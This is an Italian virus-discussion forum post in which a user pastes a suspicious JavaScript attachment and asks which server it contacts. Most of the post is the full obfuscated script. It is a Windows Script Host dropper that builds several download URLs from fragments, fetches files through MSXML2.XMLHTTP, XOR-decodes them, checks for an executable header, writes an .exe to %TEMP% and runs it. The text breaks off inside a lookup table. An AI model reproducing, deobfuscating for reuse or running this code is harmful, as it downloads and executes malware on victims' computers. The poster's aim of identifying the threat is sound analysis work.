Discussioni su virus e antivirus
 

Virus di Agosto

Alex 2 Ago 2016 19:12
Allego un probabile virus che è arrivato in formato compresso .zip

Si tratta di un javascript.

ATTENZIONE: LEGGETELO SOLO CON UN EDITOR DI TESTO, tipo notepad.

Sembra qualcosa che sfrutta le vulnerabilità di Explorer.

Io non riesco a capire con chi vorrebbe comunicare questo presunto
virus.

Bye
Alex

------------
VIRUS - LEGGERE SOLO CON NOTEPAD


var aMSq4 = 'if
(WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1)
\x21=\x20"2") WSc\x72ipt.\x51\x75it(0);\nvar Pe10 = "e" \x2b
"";\r\n\x76ar \x55z4 = "c\x6cos" + "";\r\nv\x61r\x20JTc3 =
\x22oF\x69le" + ""\x3b\r\nvar Pe1 =\x20\x22SaveT" + \x22"\x3b\r\n\x76ar
LU\x67 =\x20"ext" \x2b ""\x3b\r\nvar\x20RFl = "iteT" +
\x22";\r\nvar\x20Uf9 =\x20"wr" + "\x22;\r\nvar JQt \x3d "open"
+\x20"";\r\nvar XDd9 = "set" + "";\r\nvar Yu = "Char\x22\x20+
"";\r\nvar ULy = "type" + "";\r\nvar\x20KOe\x20= "ream\x22 + "";\r\nvar
HGb9 = "St" + "";\r\nvar Uh =\x20"\x44B." +\x20\x22";\r\nv\x61r Vo5 =
"O" \x2b "";\r\x0avar NJt = "D" + "";\r\nvar Gd = "A" + "";\r\nvar Sz =
"\x74" +\x20"\x22\x3b\r\nv\x61r My9 = "jec" + \x22";\r\n\x76ar Ha\x31 =
\x22\x65Ob\x22 + "";\x0d\nvar Po0\x20=\x20"\x65at"\x20+ "\x22;\r\nvar
Hy8 = "Cr" + ""\x3b\r\nva\x72\x20RFj = "join" +\x20""\x3b\r\n\x76ar Eo6
=\x20"e"\x20+ "";\r\nvar XUw = "rC\x6fd" + ""\x3b\r\nvar Fd =
"om\x43ha"\x20\x2b \x22";\r\nv\x61r Kt = \x22fr" \x2b "";\r\nvar Fx =
"gth\x22 + "";\r\nvar Jc \x3d "len" + "";\r\x0avar JVi =\x20"s\x68" +
"";\r\nvar \x52Un9 = "\x70u" +
"";\r\nfu\x6ection\x20IDg5(MGd){\x72eturn MGd;};var Ir8 = "eAt" +
"";\r\nv\x61r RVk = "od" + "";\x0d\x0a\x76a\x72 Xu4 = "cha\x72C" +
"\x22;\r\nva\x72 Ec9 = "th" + "";\r\nv\x61r SM\x653 \x3d "len\x67" +
"";\r\nvar Mk4\x20\x3d "e" + "";\r\nv\x61r AQa9 = "clos"\x20+
"";\x0d\x0afunction
Pa(V\x6b){ret\x75rn\x20Vk;};f'+''+'\x75nction\x20\x4eGe4(NSs5){return
NSs5;};var XHa \x3d\x20"ext" + "";\r\nvar IGy0 = "\x52eadT" +
"";\r\nvar DEm7 = "\x6ce" + "\x22;\r\nvar Sx = "mFi"
+\x20"\x22;\r\x0ava\x72 EHh = "ro" + "";\r\nvar Lz = "LoadF"
\x2b\x20"";\x0d\nvar Wn = "\x65n" + "";\r\nvar El\x39 = "op"\x20+
"\x22;\r\x0afuncti\x6fn\x20Eq9(Mn){return Mn;};var\x20Uq = "et\x22 +
\x22";\r\nvar S\x6d2 = "Chars" + "";\r\nvar Hf\x38 = "pe"
+\x20"";\r\nvar \x5aHh =\x20"t\x79" + "";\r\nvar Ie = "m" +
"";\r\x0av\x61r NFm = \x22rea\x22 + "";\r\nvar KKc1 =
"DB\x2eS\x74"\x20+ "";\r\nvar Zg2 = "O" +\x20"";\r\nvar VNd \x3d
"D\x22\x20+ "";\r\nva\x72 Pv4 = "A\x22 + "\x22;\x0d\nvar SXr =
"ct"\x20+ "";\r\nvar\x20Ix = "Obje" + "";\r\nvar YNs7 = "at\x65" \x2b
"";\r\nva\x72\x20Ml7 = "Cre" + "";\x0d\n\x76ar YKl\x36 = \x22h" +
\x22";\r\nvar Uj = "\x6cengt" + "";\r\nva\x72 \x59J\x68 = "h" +
"";\r\nvar Z\x66 =\x20"gt" + "";\r\nvar\x20VAy5 \x3d "len\x22 +
""\x3b\r\nvar NCr8 = "ce" + "";\x0d\x0avar If0 = "spli" + "";\r\nvar
Wv2 = "h" + \x22"\x3b\r\nvar YC\x75 = "lengt" + "";\r\nva\x72 Xg0 =
"gth\x22\x20+ "";\r\nvar LUo6 \x3d "len" \x2b "";\r\nvar RKw =
"gt\x68\x22 \x2b\x20"";\r\nvar \x4aNj6 = "len\x22 + ""\x3b\r\nvar RVp0
= "h" + ""\x3b\r\nvar Zh9 = "\x6ceng\x74"\x20+\x20"\x22;\r\nvar PNa5 =
"th" + "";\r\x0avar Lg = "l\x65ng" + "";\r\nvar Sa1 = \x22\x70" +
"";\r\nv\x61\x72 UZu1 = "Slee\x22 + "";\r\nvar Oj9 '+''+'\x3d \x2223" +
""\x3b\r\nv\x61r IDj = " 3"\x20+\x20"";\r\nva\x72 Et1 = "n\x22 +
"\x22;\r\nvar\x20\x49Lh6 = "R\x75" \x2b "";\r\nvar W\x78 = "ngth" +
"";\r\nvar Bv5 = "l\x65" + "\x22;\r\nvar Ki9 = \x22h" + "";\r\nvar
\x4da8 = "ngt" + "";\x0d\nvar \x58Uv = "le" + "";\r\nfunction
DEk0\x28Ja)\x7breturn Ja;};function\x20P\x4ah\x28MT\x6a4){re\x74urn
\x4dTj4;};var \x52Vy = "e" + "";\r\nv\x61r TZa = "os" + "";\r\nvar KCh5
= "cl" + "";\r\nf\x75nction AFy\x28UWx3){retur\x6e U\x57x3;};va\x72
\x5aZc8 = "le" + "\x22;\r\x0avar\x20\x45Tx9 \x3d "oFi" +
"";\x0d\nvar\x20S\x610 \x3d "ve\x54" + ""\x3b\r\nvar \x48\x732 = "Sa" +
"";\r\nf\x75\x6ect\x69on Go(SQn5){re\x74\x75rn SQn\x35;};var HXi6 =
\x22n" + "";\r\nvar\x20WHy5 = "io\x22 \x2b "";\r\nvar \x4dPk5 = "posit"
+ "";\r\nvar \x47\x54g = "Body" + "";\r\n\x76ar Ih2\x20= "ons\x65" +
"";\r\n\x76ar MUc1 = "sp" + ""\x3b\r\nvar Y\x5ab \x3d "Re"
+\x20"\x22;\r\nf\x75ncti\x6fn STv0\x28Ra0){return Ra0;};var
T\x56r3\x20=\x20"e" + "";\r\nvar \x56Tk0 = "\x77rit\x22 + ""\x3b\r\nvar
L\x4fe3 = "type" +\x20"";\r\nvar J\x57z\x33 = \x22n" +
"\x22;\r\x0av\x61r APp7 = "ope" + "";\r\nf\x75nction Xp6(Ik){return
I\x6b;};var Xf = "\x72eam" + "";\r\nv\x61r Yv \x3d "St" + "\x22;\r\nvar
\x58Os = "DB."\x20+ "";\r\x0afu\x6ection V\x773(NAa){return
NAa;};va\x72 Wt6 =\x20"O"\x20+ "";\x0d\nfun\x63\x74ion
Mf(M\x56d1\x29{re\x74urn MVd1;\x7d;v\x61r Cc0 = "D" + "";\r\nva\x72 TYj
= "A"'+''+' + "";\r\nvar Ee = "t" + "";\r\nv\x61r K\x661 =
"bjec"\x20+\x20""\x3b\r\nvar \x59j = "t\x65O"\x20+ "";\r\nvar FF\x6d
\x3d "Cr\x65a" + "";\r\nvar Lr5 = "Sleep" + "";\x0d\nvar\x20UIm = "d" +
""\x3b\x0d\nvar \x4cE\x737 = "\x73en" + "";\r\nvar BEf = "gth"\x20+
"";\r\x0av\x61r Uh6 = "len" \x2b
""\x3b\x0d\nfuncti\x6fn\x20\x4bEx3(TEw){return TEw;};var\x20Aa9 =
"\x47ET" +\x20"";\r\x0ava\x72 IDg = "open" \x2b "";\r\nfunction
Ck9\x28KFj)\x7breturn\x20KFj;};var \x49Do = "p" + "";\r\nva\x72 SDb =
"Slee" + "";\r\nvar\x20TPl =\x20"h" +\x20\x22";\r\nva\x72 L\x4cl3 =
\x22le\x6egt" + "";\r\nvar\x20RRi8 =\x20\x22ect" + "";\r\nvar Aj
=\x20"eObj" + \x22";\r\nvar Dr \x3d "Creat" + "";\r\nvar ZFt = "gth" +
"";\r\nv\x61\x72 B\x768 = "l\x65n" + "";\r\nfunction Zk(KHz9){return
KHz9;};var W\x692 = "P" +\x20"";\r\nvar Sk = "M\x4cHTT" \x2b "";\r\nvar
Ze = "2.X" + "";\r\n\x76ar NCa \x3d \x22MSXML" + "";\x0d\nva\x72
NId\x31\x20\x3d ".1" + "";\r\nva\x72 Xx4 = "t.5" +\x20"";\r\nvar GWy =
"es" + "";\r\nv\x61r Bq1\x20= "Re\x71u" + "";\r\nvar \x4cf7 = "tp" +
"";\r\nvar K\x666 = "Ht\x22 + "";\r\nvar Aw = "in" + "";\r\nv\x61r Bv7
= "tp.W" + \x22";\r\nv\x61r \x50An =\x20"Ht" + \x22";\r\nvar ZAe =
\x22Win" + ""\x3b\r\nvar I\x46m4 = "/" + "";\r\nvar Pr\x310 \x3d
\x22789+\x22 + "";\r\nvar V\x46a = "23456" + "";\r\nvar CCz = "01" \x2b
"";\x0d\x0avar Wv = "vwxyz" +\x20""\x3b\r\x0avar '+''+'Pd9 \x3d
"\x72st\x75" + "";\r\nvar VHo \x3d "mnopq" + "";\r\nvar\x20VBk = "ijkl"
+ "";\r\nvar Cc = "gh" + "";\r\n\x76\x61r\x20Dv6 = "\x62cdef" +
"";\r\nvar Ms = "WXYZa" + ""\x3b\r\x0avar \x59Vo = "RSTUV"
+\x20"";\r\x0avar Ml =\x20"M\x4eOPQ" + "";\r\nvar Lm = "IJKL" +
"\x22;\r\nv\x61r Pr\x31 \x3d "FGH" + "\x22;\r\nvar Zo\x20= "ABC\x44E" +
"";\r\x0avar USw = \x22x\x65" + "";\r\nv\x61r IFj0\x20= ".e\x22 +
""\x3b\r\nfu\x6ection Jl\x28ZYi){\x72\x65turn ZY\x69;};var Uh8 =
"d\x6a" + "";\r\n\x76ar LV\x64 = "R7\x22 +\x20"";\r\nvar\x20DTv \x3d
"pVW" + "";\r\nv\x61r \x52h1 = "e3" +\x20"";\r\nvar RGn =\x20"XN" +
"";\r\x0afuncti\x6fn Jn9(Jm3){return Jm3;};v\x61r ZSf = "%/" +
"";\r\nvar\x20PEc = "%T\x45M\x50" + "";\r\nvar \x53Sq = "ell" \x2b
"";\r\nvar DWb8 = "pt.Sh\x22 + "";\r\nvar Ot8 = "WScri" +
"";\r\nfunction Up(Wr6){ret\x75r\x6e W\x726;};var Zu = "\x74" +
""\x3b\r\nvar As3 = "jec" +\x20\x22";\r\x0avar LF\x70\x20= "ateOb" +
"";\r\nvar \x52Je4 = \x22Cre\x22 + "";\r\nvar IVm = \x22v"
\x2b\x20"";\r\nvar Hh = "4\x7ao4c" + "";\r\nvar RG\x6c2 = \x22qk" +
"";\r\nvar NLs = "l/" + "";\r\nvar Wc = "j.p" + "";\r\nvar Lq3 = "fu" +
"";\r\nvar X\x735 \x3d "gra" + "";\r\nvar Oj\x32\x20= "f\x6fto" +
"";\r\nvar Dt6 = \x22//" + "";\r\nvar R\x695 = "p:" \x2b ""\x3b\r\nvar
Yy1 = "htt" + "";\x0d\x0avar Ae = "\x362"\x20\x2b \x22";\r\nvar Cl8 =
"cn" + "'+''+'";\r\x0av\x61r Un = "\x6ccou" + "";\r\nfunctio\x6e
RTo2(Xh\x31){retur\x6e Xh1;};var L\x728 =\x20".c\x6fm/" + "";\r\nva\x72
QRy5 = ******* \x20+ "";\r\nvar MSc5 = "oi" +\x20"";\r\n\x76a\x72 NAm9
\x3d "w.gi" + \x22\x22;\r\n\x76ar Qq = "//w\x77\x22 +
"";\r\nvar\x20WSb0 \x3d "p\x3a" + "\x22;\r\nfunction
Rj3\x28TXh\x29{return T\x58h;};var Sj5\x20= "htt" + "\x22;\r\n\x76ar
FYs1 = "nt3" + "";\r\nvar Nn5 = \x2243" + "";\r\nvar Cy5 = "/07"\x20+
\x22";\r\nvar Po = "et"\x20+ "";\r\nv\x61\x72 RWi =\x20".n" +
"";\r\nv\x61r Wn\x31 = "\x61na"\x20+ "";\r\nvar Nl = ".b\x61g" +
"";\r\n\x76ar Qc4\x20=\x20\x22ww" + \x22";\r\nva\x72\x20\x45i =
\x22\x2fw"\x20+ "";\r\nvar Kx2\x20= \x22:/"\x20+ "";\r\nvar S\x55f2 =
"http" + ""\x3b\r\x0avar Lc = "7\x22 \x2b ""\x3b\r\nvar Ep3\x20= "43" +
"";\x0d\n\x76ar Vh = "th" + "";\r\n\x76ar \x57Kb = "leng" +
"";\r\n\x66unction Su(S\x48\x764){return SHv4;};var Xt6 = "VV\x22
+\x20"";\r\nvar MS\x6c = \x22\x56V" + "";\r\nvar\x20Te\x31 = "VVVVV" +
"";\r\nvar Zs5 = "VV" + \x22";\r\nvar \x43Z\x698 = "fd" + "\x22;\r\nvar
KJd \x3d "s\x64fas" + "";\r\n\x76ar\x20\x44v3 = "asfa" + "";\r\nv\x61r
OOh = "h"\x20+ "";\r\nvar\x20Ud\x38\x20= \x22gt" + "";\r\x0avar FOp3
=\x20"len\x22 + "";\r\nfunctio\x6e Zb1(CZq){\x72\x65turn CZq;\x7d;var
Pa1 = "V" + "";\r\nv\x61r G\x734 = "VVVVV" + ""\x3b\r\nvar TXe8 =
"VV"\x20+ "";\r\x0avar\x20H\x4dr4 = "\x56VVVV" + "";\r\nvar Ol = "VVV"
+ "";\r\nvar\x20'+''+'ZDo7 = "VVV\x56\x22 + "";\r\nvar\x20YUc = "VV" +
"";\r\nvar Xc6 = "VV" + "";\r\nvar Wp = "VVVVV\x22 + "";\r\nvar Ca8 =
"VVVVV" + "";\r\nv\x61r Dh5 =\x20"VVV" + "";\r\nv\x61r EGw = "VV" \x2b
"";\r\nvar \x4dj = "V\x56VVV" + "\x22;\r\n\x66unct\x69on
Oq(\x50f0){r\x65turn Pf0;\x7d;function S\x47v\x28KLy5)\x7bre\x74urn
KLy5;}\x3bfu\x6ect\x69on JQu(KKh4){return K\x4bh4;};var OX\x769 = "gth"
+ "";\r\nv\x61r Q\x53c\x20=\x20\x22le\x6e\x22 + \x22";\r\nva\x72 EYf =
"VVV" +\x20"\x22;\r\n\x76ar IIk2 = "VV" + "";\r\n\x76ar CZy = "VV" +
"";\r\nvar Jl9 = "VVVVV" +\x20"";\r\nfunction \x49f(YBe){return
YBe;};var Kg = "\x3132" +\x20"";\r\nvar \x42S\x734 = "\x31123" +
"";\r\nvar \x4dz9=(B\x53s4 + If(Kg\x29,\x20Jl\x39 + CZy + IIk2 +
(function NKy0\x28){return EY\x66;}()));\r\nvar Te=Mz9[QSc +
O\x58v9];\r\nvar NVd=\x28Mj \x2b (function Oi5(){return EG\x77;}()\x29
+ Dh5 \x2b Ca8 + (function EPo\x28){retur\x6e \x57p;}()) + \x58c6 +
Zb1(YUc) +\x20ZDo7 + \x4fl + HMr4 + \x54Xe8 +\x20\x47s4 + Pa1);\r\nvar
Gz = 672\x316\x38;\r\nvar Id=N\x56\x64[QSc + OXv9];\r\nvar Pe0=(Dv3 +
KJd +\x20\x28fu\x6ection IMn(){return CZi8\x3b}()), Zs5 + Te1 +
S\x75(\x4dSl) \x2b Xt6);\r\nvar UWy4=Pe0[QSc + (\x66unction
LBy(){return \x4f\x58\x769;}())];\r\n\r\nvar GRx5=1;\r\nvar
DAe=2;\r\nvar Ya=3\x3607 -\x203605;\x0d\nvar U\x4dc="437";\r\n\r\nvar
ERb='+''+'\x5bSUf2+Kx2 + (function Fb(){ret\x75r\x6e
Ei;}(\x29)+Q\x634+(f\x75nction\x20Zq9(){\x72eturn
Nl\x3b}())+Wn1+RWi+Po+C\x795 + Nn5+(function GNn(){return
FYs1;}()),\x20Rj\x33(Sj5)+\x57\x53b0+(fun\x63tion Ry0(){return
Qq;}()\x29+NAm9+MSc5 + QRy5+RTo2(Lr\x38)+Un+C\x6c8+Ae, Yy1\x20+
Ri5+(function X\x6c2(){return Dt6;}(\x29\x29+Oj2+Xs5 +
Lq3\x2bWc+(function Ii(){retur\x6e NLs\x3b}()) +
RG\x6c2+Hh+IVm];\r\nvar Ba5=WScript[RJe4 + LFp + As3 + (\x66unct\x69on
Wc\x36(){return Zu;\x7d())](Ot8 + D\x57b8 +
SSq);\r\nvar\x20Mz=B\x615.\x45xpandEnvi\x72\x6fnmentStrings(Jn\x39\x28PEc)
+ Z\x53\x66);\r\x0a\x76\x61\x72 \x52J\x702\x3dMz + RG\x6e + R\x681 +
Jl(D\x54v) \x2b (function GOk\x28){return LVd;}()) \x2b Uh8;\r\nvar
RCn=RJp2 + I\x46j0 + USw;\r\n\r\nfunction uheprng() {return
(function()\x20{\x0d\nva\x72 o =\x2048, c = 1, p = \x6f, s = \x6eew
Arra\x79(o);\r\n\x76\x61r \x69,j\x3b\x0d\nvar \x62ase64char\x73 =
"ABCDEFGHIJKLMNOPQRSTU\x56WXYZabcdefghijklm\x6eopqr\x73tuvwxyz0123456789+/\x22;\r\nvar

mash = Mash(\x29;\r\x0afor (i = 0; i < \x6f; i++) \x73[i]
=\x20mash(Gz);\r\nmash\x20= null;\r\nvar ra\x6edom = f\x75nction( range
) {\x0d\x0a\x72eturn\x20Math\x2eflo\x6fr(range * (rawprng() +
(rawp\x72ng(\x29 * 0x200000 | 0\x29 *
1.1102230246\x3251565e-16\x29);\r\n}\r\n
\r\nfunction\x20r\x61wprng() {\r\ni\x66 (++p >= o'+''+') \x70 =
0;\r\nvar t \x3d 176\x38863 *\x20s[p] \x2b c *
2.32830\x36436538696\x33e-10;\r\nret\x75rn s\x5b\x70] = t - (c
\x3d\x20t | 0);\r\n}return random;}\x28));\x7d;\r\n\r\nfuncti\x6fn
Ma\x73h() {\r\nvar n = 0xefc82\x349d;\r\nvar mash = functi\x6fn(data)
{\r\nif ( data ) {\r\ndata = data.toS\x74rin\x67();\r\nfor (var i = 0;
i \x3c d\x61ta.length; i++) {\r\nn +=
d\x61t\x61.charCodeAt\x28i);\r\nvar h = 0.02519603282\x341\x36938\x20*
n;\r\nn\x20= h\x20>\x3e> \x30;\r\nh -= n;\r\nh *= n;\r\nn = h
>>>\x200;\r\n\x68 -= n;\x0d\nn\x20+= h * 0x100000000;\r\n}\r\nreturn (n >>> 0)
>>> * 2.3283\x3064365386963e\x2d10;\r\n} else\x20n =
>>> 0\x78\x65fc8249d;\r\n};\r\nreturn mash;\r\n\x7d\r\n\r\nva\x72
>>> \x50e\x3d[ZA\x65 + PAn + Bv7 + A\x77 \x2b \x4bf6 + Lf7 + Bq1 + GW\x79 + Xx4
>>> + N\x49d1, (function Dq8(){return NC\x61;}()) + Zk(Ze) + Sk + (function
>>> BIy1(\x29{retu\x72n Wi2;}\x28))];\x0d\n\x0d\nfor (var OPj=0;\x20O\x50j <
>>> Pe[QSc + (func\x74i\x6f\x6e FTj\x28\x29{r\x65turn
>>> OXv9;}())];\x20OPj++)\r\n{\r\n\ttr\x79 \r\n\t{\r\n\t\tv\x61r
>>> Sy=WSc\x72ipt\x5b\x28functi\x6fn R\x65\x31(){return\x20\x52Je4;\x7d())\x20+
>>> (functio\x6e Mh\x28){return LFp;}()) \x2b As3 +
>>> Zu](Pe[OPj]);\r\n\t\tbreak;\r\n\t}\r\x0a\tcatch
>>> (e)\r\n\t{\r\n\t\tcontinue;\x0d\n\t}\r\n};\r\n\x0d\nvar \x55\x7a\x3d7\x3408
>>> - 7407;\r\nvar
>>> OEq6=0;\r\ndo\r\n{\x0d\n\t\x74\x72y\r\n\t\x7b\r\n\t\tif\x20(1=\x3d
>>> Uz)\r\n\t\t{\r\x0a\t\t\tif (OEq6\x20>= ERb[QSc
>>>
+\x20OXv9]'+''+')\r\n\t\t\t{\r\n\t\x09\t\tOEq6=0;\r\n\t\x09\t\tWScript[Ck\x39(SDb)

>>> +\x20IDo\x5d(100\x30);\r\n\x09\t\t}\r\n\t\t\tS\x79[\x49Dg](KEx3(Aa9\x29,
>>> ERb[OEq6++ % ERb[QSc \x2b O\x58\x769]], f\x61ls\x65);\r\x0a\t\t\tSy[LEs7 +
>>> (function Od(){re\x74urn UIm;}())]();\r\n\x09\t}\r\n\t\t\r\n\t\tif
>>> (Sy.rea\x64y\x73t\x61te < (-1915\x20+ 1919))
>>> \r\x0a\t\t{\r\n\t\t\tWScr\x69p\x74[SDb + IDo](-1310 +
>>> 1\x3410)\x3b\r\n\t\t\tcontinu\x65;\r\n\t\t}\r\n\t\t\r\n\t\tvar
>>> ARt=WScript[RJe4 + LFp + (function CY\x69(){return As3;}(\x29) + (function
>>> ELr\x34(){retur\x6e \x5au;}())]\x28TYj+Mf(Cc0)+\x57t6+X\x4fs\x20+ Yv +
>>> Xp6(Xf)\x29;\r\x0a\t\tAR\x74[IDg]()\x3b\r\n\t\tAR\x74\x5bLO\x653]=GRx5;
>>> \r\n\t\tARt[V\x54k\x30 + STv0(TVr3)](Sy[Y\x5ab + MU\x63\x31 +\x20Ih2 +
>>> \x47Tg]);\x0d\n\t\x09ARt[MPk5 \x2b WHy5 + Go(HXi6)]=1\x20*
>>> 0;\r\n\t\tARt[Hs\x32 + AFy\x28\x53a\x30)\x20+ (fun\x63tion Ix6(){\x72eturn
>>> E\x54x9;}()) + ZZc8](RJp\x32, Ya);\r\n\t\t\x41\x52t[DEk0(KCh5) \x2b
>>> TZa\x20+ PJh\x28RVy)]();\r\n\t\x0d\n\t\tvar HFz=KTb8 /* k
>>> *\x2f(RJp2)\x3b\t\t\r\n\t\tHFz=BKw(HFz);\r\n\t\tif (HFz[\x51Sc + OXv9] <
>>> 100\x20* 1\x3024\x20|| HFz\x5bQ\x53c + Oq(OXv9)] > (58 * 3 +\x2056\x29 *
>>> \x31024
>>>
||\x20!VOy7(HFz\x29)\r\n\t\t{\r\n\x09\t\tUz=1;\r\n\t\t\tcontinue;\r\n\t\x09}\r\n\t\ttry\r\n\t\t{\r\n\t\t\tVg8(RCn,

>>> HFz);\r\x0a\t\t} \r\n\t\t\x63at\x63h (e)
>>> {break;};\t\t\r\n\t\t\r\n\t\tBa5[ILh6 + Et1](R\x43n + (functio\x6e
>>> JYj5(){retur\x6e IDj;}()) + Oj9);\r\n\t\tbreak;\r\n\x09}\r\n\tcatc'+''+'h
>>> (e) {WScript[SDb\x20+ IDo](1\x3000\x29; continue;};\r\n} while
>>> (Uz\x29;\r\n\r\nWSc\x72i\x70\x74.Quit(0\x29;\r\n\r\nfunc\x74ion BK\x77(DHf1
>>> /* \x6b\x20 */)\r\n{\r\n\tv\x61r REt2;\r\n\t\r\n\tvar XPx8 =
>>> u\x68e\x70\x72ng\x28\x29;\r\x0a\tfor (var OPj=0\x3b O\x50j < DHf1[\x51Sc +
>>> \x4f\x58v9]; OPj++)\r\n\t{\r\n\t\tD\x48\x661[OP\x6a] ^=
>>> XPx8(256\x29;\r\n\t}\r\n\r\n\tvar Cm=DHf1[DHf1[Q\x53\x63 +
>>> S\x47v(OXv\x39)]\x2d4] | \x44Hf1[DHf1[Q\x53c + OXv9]-3] <<\x20(-1476 +
>>> 1484) | DH\x661[DHf1[QSc + OXv9]-2] << 16 \x7c DHf1[DHf\x31[QSc + OXv9]-1]
>>> \x3c< 24;\x09\r\n\tDHf1[If0 +\x20NCr8](HFz[QSc + OXv9]-\x34,
>>> 4);\r\n\t\r\n\tREt2=Te;\r\x0a\tfor (va\x72 O\x50j=0; OP\x6a \x3c
>>> DH\x661[QSc + OXv9]; OPj++)\r\n\t{\r\n\t\tREt2=(REt2 + DHf1[OPj]) %
>>> 0x10000000\x30;\x0d\x0a\t};\r\n\tif (\x52Et2\x20!= Cm) {retu\x72n
>>> [];}\x3b\r\n\t\r\x0a\treturn DHf1 /* \x6b\x20
>>> */;\r\n};\x0d\n\r\n\r\nfunction VOy7(DHf1 /* k
>>> *\x2f)\r\x0a\x7b\x0d\n\tif\x20(DHf1[0]==\x200x4D && DHf1[1]\x3d\x3d
>>> 0x5a)\r\n\t\x09{re\x74urn
>>>
\x74rue\x3b}\r\n\telse\r\n\t\t{return\x20fals\x65;}\r\n};\r\n\r\x0a\r\nfunctio\x6e\x20KT\x628

>>> /* k */\x28Ec)\r\n{\r\x0a var WHy0\x3dWScript[RJe\x34 + LFp + As3 +
>>> (function \x57c\x30\x28\x29{return
>>> \x5a\x75;}())](TYj+(f\x75nction\x20\x47i2(){re\x74urn
>>> Cc0;\x7d()\x29+Wt6\x2bXOs + Yv + Xf);\r\n WHy0[LOe3]=DAe;\r\n
>>> WH\x790[Sm2 +\x20Eq9\x28U\x71)\x5d=UMc /* k \x2a/;\r\n
>>> W\x48y0[IDg]()\x3b\r\n WHy0[Lz + EHh + Sx\x20+
>>> DE'+''+'m\x37](Ec);\r\n\x20 var Bw\x3dWHy0[Pa(IGy\x30)\x20+
>>> NGe4(XHa)];\r\n \x57Hy0[\x4bC\x685 + TZa + RVy]\x28);\r\n retur\x6e
>>> NFc(Bw\x29;\r\n};\r\n\r\n\r\nfunctio\x6e\x20NFc(Tf\x30)\r\n{ \r\nvar
>>> Sq=new A\x72ray(\x29;\r\n\t\r\nSq[2071 -
>>> 1872\x5d=12\x38;\r\nSq[252\x5d=129;\r\nSq[233]=130;\r\nSq[226]=\x2d370 +
>>> \x3501;\r\nSq[228]=54\x349 -
>>>
\x35317;\r\nSq[2\x324\x5d=1\x33\x33;\r\nSq[229]=1\x334;\x0d\nSq[231]=135;\r\n\x53q[-1\x3236

>>> + 1470]=136;\r\nSq[235]=-\x36251\x20+ 6\x3388;\r\nSq[5\x32\x20* 4 \x2b
>>> 24\x5d=-6678 + 6816;\r\n\x53q[239]=9\x3632\x20- 9493;\r\nSq[25\x20* 9
>>> +\x2013]=140;\r\nSq[236]=\x3141;\r\nSq[-1000 +
>>> 1196\x5d=142;\r\nSq\x5b6707\x20- 6510]=37 * 3 +
>>> 32;\r\nSq[201]=1\x344;\r\nSq[5754 -
>>> 5524\x5d=1\x345;\r\nSq[198]=146;\r\nSq[244]=-9711\x20+
>>> 9858;\r\nSq[246]=-\x38937 +
>>> 9\x30\x38\x35;\x0d\nSq[242]=14\x39;\r\nSq[7\x32\x34\x32 -
>>> 6991]=150;\r\x0aSq[24\x39]=6872 - 6721;\r\nSq[255]=15\x32;\r\nSq[28 \x2a 7
>>> \x2b
>>>
18]\x3d15\x33;\r\nSq\x5b2\x320]=154\x3b\r\x0aSq\x5b162]=155;\r\nSq[163]=156;\r\x0aSq[165]\x3d157\x3b\x0d\nSq[1090

>>> * 7\x20\x2b 729]=158\x3b\r\nSq[402]=-4162 +
>>> 4321;\r\nS\x71\x5b225]=160;\r\n\x53q[237]=-18\x332
>>> +\x2019\x393\x3b\r\nSq[243]=16\x32;\r\nSq[20 * 12 +
>>> 10]=16\x33;\r\x0aSq[2\x341]=164;\r\nSq[209]=77 * 2 +
>>> 11;\r\nSq[17\x30]=1\x36\x36;\r\nSq\x5b3079 - 2893]=167;\r\nSq[191]=83 *
>>> \x32\x20+ 2\x3b\r\nSq[897\x36]\x3d-4856 +
>>> 5025;\r\nSq[17\x32]=170;\r\n\x53q[8635 -
>>> 844\x36]=171;\r\n\x53q'+''+'[1\x388]=172;\x0d\nSq\x5b161\x5d=-6756 +
>>>
6929;\x0d\nSq[\x3171]=\x3174;\x0d\x0aS\x71[187]=\x3175;\r\nSq[9617]=17\x36;\r\x0aSq[626\x34

>>> + 3354]=177;\r\nSq[9619]=55 * 3 \x2b
>>> 13\x3b\r\nSq[9474]=1\x379;\r\nSq[\x395\x308]=9225 -
>>>
\x39045;\r\nSq[9569]=\x3181;\r\nSq[9570]=182;\r\nSq[9558]=183;\x0d\nSq[186\x338
>>> -
>>>
9081\x5d=18\x34;\r\nSq[9571]=18\x35;\x0d\nSq[9553]=186;\r\nS\x71[9559]\x3d187;\x0d\nSq[4507

>>> + 5\x3058]=\x3188;\r\nSq[9564]=189;\r\n\x53\x71[15\x3896\x20-
>>> 6333]=1\x390;\r\x0aSq[\x3541\x36 + 4\x3072]=191;\r\nSq[114\x32 * \x38 +
>>> 3\x356\x5d=85 *\x202 + 22;\r\nSq[1285 * 7 \x2b
>>> 529]=193;\r\nSq[9516]=1\x394;\r\nSq[9500\x5d=1\x395; \x20\x20
>>> \r\nSq\x5b9472]=196;\x0d\nSq[3928 +
>>> 5604]=197;\r\nSq[956\x36]=198;\r\nSq[93\x330 + 237]=199;\r\nSq[2706 +
>>> 6\x385\x36]=97 * 2 \x2b
>>> 6;\r\nSq[9556]=201\x3b\r\nSq[9577]\x3d\x3202;\r\nSq\x5b5251 +
>>> 4323]=2\x30\x33;\r\x0aSq[4346 * 2 +
>>>
876\x5d=2\x304;\r\nSq[95\x352]=205;\x0d\n\x53q[\x39580]=206;\r\nSq[9\x3575]=7962

>>> -
>>>
7755;\r\nS\x71[9576]=20\x38\x3b\r\n\x53q[9572\x5d=209;\r\nSq[9573]\x3d210;\r\nSq[\x39561]=211;\r\nSq[956\x30]=212;\r\nSq[95\x35\x34]=213;\r\nSq[9555]=21\x34;\r\nSq[9579]=2\x315;\r\nSq[\x3957\x38]=4\x37

>>> * \x34 +
>>>
28;\r\x0aSq[9496]\x3d217\x3b\r\n\x53q[9484]=21\x38;\r\nSq[9608]=219;\r\nS\x71[9604]=5823

>>> - 5603;\r\nSq[9612]=221;\r\x0aSq\x5b961\x36]=59 *\x203 +
>>> \x345;\r\nSq[\x33850 * 2 +
>>> \x31900]=223;\x0d\nS\x71[945]=224;\r\nS\x71[-5278 +
>>> 5501]=225;\r\x0aSq[915]'+''+'=226;\r\nSq[-62\x377 +
>>> 7237]=227;\r\nSq[931]=-1173 + 1401;\r\nSq\x5b237 * 4 +
>>> 1\x35\x5d=229;\r\nSq\x5b181]=-8247 +
>>> 8477;\r\n\x53q[964]=2\x331;\r\nS\x71[9\x33\x34]\x3d88 * \x32 +
>>> 56;\r\nSq[920\x5d=233;\r\nSq[937]=23\x34;\r\nSq[336 * 2 + 276]=235; \x20
